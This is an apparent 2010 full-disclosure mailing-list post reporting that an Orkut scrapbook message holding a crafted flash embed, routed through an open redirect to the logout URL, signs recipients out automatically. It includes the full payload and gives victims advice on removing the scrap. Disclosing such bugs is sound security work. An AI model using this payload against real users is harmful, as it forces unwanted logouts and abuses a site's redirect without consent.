Date: Sat, 12 Jun 2010 23:10:39 +0530
From: ㅤ ㅤRockey <skg102@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Orkut Signout via scrap

Hello,

There is a small bug in orkut scrapbook that if any one sends a scrp
containing the following code

<embed type="application/x-shockwave-flash"
src="promote.orkut.co.in/redirect?u=http://www.orkut.co.in/GLogin?cmd=logout"
style="" id="979482838" name="979482838" bgcolor="#FFFFFF"
quality="autohigh" wmode="transparent" allownetworking="internal"
allowscriptaccess="never" height="1" width="1">

Then the recipient will logout automatically from the orkut.

Same thing occurred to me while I was browsing and mail was sent to me
from my friend Nikhil and In case same thing occurs with you then you
should try to delete that scrap on next login and In case you are
unable to do that then you can simply disable flash then you will be
able to delete that scrap.

Cheers,
Rockey Killer

--